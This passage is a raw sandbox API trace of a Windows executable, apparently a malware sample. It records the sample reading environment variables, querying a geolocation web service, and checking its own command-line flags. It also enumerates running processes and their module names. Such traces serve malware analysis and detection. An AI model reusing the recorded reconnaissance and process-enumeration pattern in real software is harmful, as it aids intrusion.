[0039.129] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x54) returned 0x682f60 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5e03", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x18) returned 0x677df0 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PROCESSOR_REVISION=5e03", cchWideChar=-1, lpMultiByteStr=0x677df0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PROCESSOR_REVISION=5e03", lpUsedDefaultChar=0x0) returned 24 [0039.129] GetLastError () returned 0x0 [0039.129] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x58) returned 0x682f60 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0039.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1b) returned 0x681410 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramData=C:\\ProgramData", cchWideChar=-1, lpMultiByteStr=0x681410, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramData=C:\\ProgramData", lpUsedDefaultChar=0x0) returned 27 [0039.129] GetLastError () returned 0x0 [0039.129] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x5c) returned 0x682f60 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0039.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x24) returned 0x67cec0 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x67cec0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 36 [0039.129] GetLastError () returned 0x0 [0039.129] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x60) returned 0x682f60 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0039.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x29) returned 0x67d620 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramFiles(x86)=C:\\Program Files (x86)", cchWideChar=-1, lpMultiByteStr=0x67d620, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramFiles(x86)=C:\\Program Files (x86)", lpUsedDefaultChar=0x0) returned 41 [0039.129] GetLastError () returned 0x0 [0039.129] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x64) returned 0x682f60 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0039.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1e) returned 0x681438 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ProgramW6432=C:\\Program Files", cchWideChar=-1, lpMultiByteStr=0x681438, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProgramW6432=C:\\Program Files", lpUsedDefaultChar=0x0) returned 30 [0039.129] GetLastError () returned 0x0 [0039.129] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x68) returned 0x682f60 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0039.129] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x41) returned 0x679238 [0039.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", cchWideChar=-1, lpMultiByteStr=0x679238, cbMultiByte=65, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PSModulePath=C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpUsedDefaultChar=0x0) returned 65 [0039.129] GetLastError () returned 0x0 [0039.129] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x6c) returned 0x682f60 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0039.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x17) returned 0x677e10 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="PUBLIC=C:\\Users\\Public", cchWideChar=-1, lpMultiByteStr=0x677e10, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PUBLIC=C:\\Users\\Public", lpUsedDefaultChar=0x0) returned 23 [0039.130] GetLastError () returned 0x0 [0039.130] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x70) returned 0x682f60 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0039.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0xf) returned 0x680b18 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemDrive=C:", cchWideChar=-1, lpMultiByteStr=0x680b18, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemDrive=C:", lpUsedDefaultChar=0x0) returned 15 [0039.130] GetLastError () returned 0x0 [0039.130] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x74) returned 0x682f60 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0039.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x16) returned 0x677e30 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="SystemRoot=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x677e30, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="SystemRoot=C:\\Windows", lpUsedDefaultChar=0x0) returned 22 [0039.130] GetLastError () returned 0x0 [0039.130] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x78) returned 0x682f60 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0039.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2a) returned 0x67d658 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x67d658, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TEMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 42 [0039.130] GetLastError () returned 0x0 [0039.130] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x7c) returned 0x682f60 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 41 [0039.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x29) returned 0x67d690 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", cchWideChar=-1, lpMultiByteStr=0x67d690, cbMultiByte=41, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="TMP=C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp", lpUsedDefaultChar=0x0) returned 41 [0039.130] GetLastError () returned 0x0 [0039.130] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x80) returned 0x682f60 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0039.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x15) returned 0x677e50 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERDOMAIN=XDUWTFONO", cchWideChar=-1, lpMultiByteStr=0x677e50, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERDOMAIN=XDUWTFONO", lpUsedDefaultChar=0x0) returned 21 [0039.130] GetLastError () returned 0x0 [0039.130] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x84) returned 0x682f60 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 30 [0039.130] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x1e) returned 0x683008 [0039.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERNAME=5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x683008, cbMultiByte=30, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERNAME=5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 30 [0039.130] GetLastError () returned 0x0 [0039.131] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x88) returned 0x682f60 [0039.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 42 [0039.131] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x2a) returned 0x67d6c8 [0039.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", cchWideChar=-1, lpMultiByteStr=0x67d6c8, cbMultiByte=42, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="USERPROFILE=C:\\Users\\5p5NrGJn0jS HALPmcxz", lpUsedDefaultChar=0x0) returned 42 [0039.131] GetLastError () returned 0x0 [0039.131] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x682f60, Size=0x8c) returned 0x683fe8 [0039.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 18 [0039.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x12) returned 0x677e70 [0039.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windir=C:\\Windows", cchWideChar=-1, lpMultiByteStr=0x677e70, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windir=C:\\Windows", lpUsedDefaultChar=0x0) returned 18 [0039.174] GetLastError () returned 0x0 [0039.174] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x683fe8, Size=0x90) returned 0x683fe8 [0039.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0039.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x18) returned 0x677e90 [0039.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_flags=3", cchWideChar=-1, lpMultiByteStr=0x677e90, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_flags=3", lpUsedDefaultChar=0x0) returned 24 [0039.174] GetLastError () returned 0x0 [0039.174] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x683fe8, Size=0x94) returned 0x683fe8 [0039.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 70 [0039.174] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x8, Size=0x46) returned 0x679288 [0039.174] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", cchWideChar=-1, lpMultiByteStr=0x679288, cbMultiByte=70, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="windows_tracing_logfile=C:\\BVTBin\\Tests\\installpackage\\csilogfile.log", lpUsedDefaultChar=0x0) returned 70 [0039.174] GetLastError () returned 0x0 [0039.174] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x683fe8, Size=0x98) returned 0x683fe8 [0039.174] GetLastError () returned 0x0 [0039.211] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.212] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.212] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.217] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8ec) returned 0x684088 [0039.248] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.249] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x680b30 [0039.249] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.249] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.249] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.299] RtlSizeHeap (HeapHandle=0x660000, Flags=0x0, MemoryPointer=0x682af8) returned 0x80 [0039.304] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0039.404] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x676e28 [0039.404] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="https://api.2ip.ua/geo.json", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0040.111] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x18aff8, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x18d7f8 | out: lpBuffer=0x18aff8*, lpdwNumberOfBytesRead=0x18d7f8*=0x1d1) returned 1 [0040.112] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0040.113] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0040.113] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x68ef50 [0040.119] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1e0) returned 0x3212370 [0040.124] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3212370 | out: hHeap=0x660000) returned 1 [0040.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x68ef50 | out: hHeap=0x660000) returned 1 [0040.129] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x676e28 | out: hHeap=0x660000) returned 1 [0040.129] GetCurrentProcess () returned 0xffffffff [0040.129] GetLastError () returned 0x2 [0040.129] SetPriorityClass (hProcess=0xffffffff, dwPriorityClass=0x80) returned 1 [0040.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x6b39b8 [0040.134] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8ec) returned 0x3231570 [0040.139] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x800) returned 0x6b3ff0 [0040.139] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x6b3ff0, nSize=0x400 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\penelop0611_2019-11-06_10-30.exe_.exe")) returned 0x4b [0040.140] PathRemoveFileSpecW (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0040.145] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x810) returned 0x3231e68 [0040.145] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" --Admin IsNotAutoStart IsNotTask" [0040.145] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d8d8 | out: pNumArgs=0x18d8d8) returned 0x31f3b60*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0040.145] lstrcpyW (in: lpString1=0x18e568, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0040.145] lstrcmpW (lpString1="IsAutoStart", lpString2="IsNotAutoStart") returned -1 [0040.145] lstrcmpW (lpString1="IsTask", lpString2="IsNotTask") returned 1 [0040.150] GetCommandLineW () returned="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" --Admin IsNotAutoStart IsNotTask" [0040.151] CommandLineToArgvW (in: lpCmdLine="\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe\" --Admin IsNotAutoStart IsNotTask", pNumArgs=0x18d874 | out: pNumArgs=0x18d874) returned 0x31f3b60*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe" [0040.184] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\penelop0611_2019-11-06_10-30.exe_.exe") returned="penelop0611_2019-11-06_10-30.exe_.exe" [0040.184] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76c20000 [0040.184] GetProcAddress (hModule=0x76c20000, lpProcName="EnumProcesses") returned 0x0 [0040.184] GetProcAddress (hModule=0x76c20000, lpProcName="EnumProcessModules") returned 0x0 [0040.184] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleBaseNameW") returned 0x0 [0040.184] LoadLibraryW (lpLibFileName="Psapi.dll") returned 0x75140000 [0040.186] GetProcAddress (hModule=0x75140000, lpProcName="EnumProcesses") returned 0x75141544 [0040.186] GetProcAddress (hModule=0x75140000, lpProcName="EnumProcessModules") returned 0x75141408 [0040.186] GetProcAddress (hModule=0x75140000, lpProcName="GetModuleBaseNameW") returned 0x7514152c [0040.186] EnumProcesses (in: lpidProcess=0x183070, cb=0xa000, lpcbNeeded=0x18d880 | out: lpidProcess=0x183070, lpcbNeeded=0x18d880) returned 1 [0040.188] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0040.188] CloseHandle (hObject=0x0) returned 0 [0040.188] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0040.188] CloseHandle (hObject=0x0) returned 0 [0040.188] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x104) returned 0x0 [0040.188] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x148) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x188) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1b0) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1cc) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1d4) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1dc) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x254) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x298) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x2cc) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x334) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.189] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x36c) returned 0x0 [0040.189] CloseHandle (hObject=0x0) returned 0 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3a8) returned 0x0 [0040.190] CloseHandle (hObject=0x0) returned 0 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x3f8) returned 0x0 [0040.190] CloseHandle (hObject=0x0) returned 0 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x124) returned 0x0 [0040.190] CloseHandle (hObject=0x0) returned 0 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x448) returned 0x5a4 [0040.190] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0040.190] CloseHandle (hObject=0x5a4) returned 1 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x45c) returned 0x5a4 [0040.190] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0040.190] CloseHandle (hObject=0x5a4) returned 1 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x480) returned 0x0 [0040.190] CloseHandle (hObject=0x0) returned 0 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4ac) returned 0x5a4 [0040.190] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0040.190] CloseHandle (hObject=0x5a4) returned 1 [0040.190] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4d4) returned 0x0 [0040.190] CloseHandle (hObject=0x0) returned 0 [0040.191] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x50c) returned 0x5a4 [0040.191] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 0 [0040.191] CloseHandle (hObject=0x5a4) returned 1 [0040.191] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5f0) returned 0x0 [0040.191] CloseHandle (hObject=0x0) returned 0 [0040.191] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x354) returned 0x5a4 [0040.191] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.192] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0xae0000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="chairs.exe") returned 0xa [0040.192] CloseHandle (hObject=0x5a4) returned 1 [0040.192] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x5a8) returned 0x5a4 [0040.192] EnumProcessModules (in: hProcess=0x5a4, lphModule=0x18d88c, cb=0x4, lpcbNeeded=0x18d870 | out: lphModule=0x18d88c, lpcbNeeded=0x18d870) returned 1 [0040.193] GetModuleBaseNameW (in: hProcess=0x5a4, hModule=0x170000, lpBaseName=0x18d070, nSize=0x400 | out: lpBaseName="im_disability.exe") returned 0x11 [0040.193] CloseHandle (hObject=0x5a4) returned 1 [0040.193] OpenProcess (dwDesiredAccess=0x410, 